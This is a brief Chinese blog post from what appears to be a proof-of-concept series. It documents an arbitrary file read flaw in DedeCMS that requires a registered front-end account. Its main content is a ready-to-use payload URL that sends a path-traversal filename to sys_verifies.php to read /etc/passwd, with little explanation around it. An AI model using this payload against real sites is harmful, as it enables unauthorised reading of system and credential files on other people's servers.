Pages

Menu

Babing
Published on 2024-08-30 / 2 Visits
0
0

D20-4DedeCMS--任意文件读取

#Pocs

D20-4DedeCMS–任意文件读取

漏洞描述:

需前台注册用户权限。

漏洞复现:

payload:

http://ip/dede/sys_verifies.php?action=view&filename=././/etc/passwd
D21-1D-LINK-DI-81...
D20-3DedeCMS--任意文件读取

Comment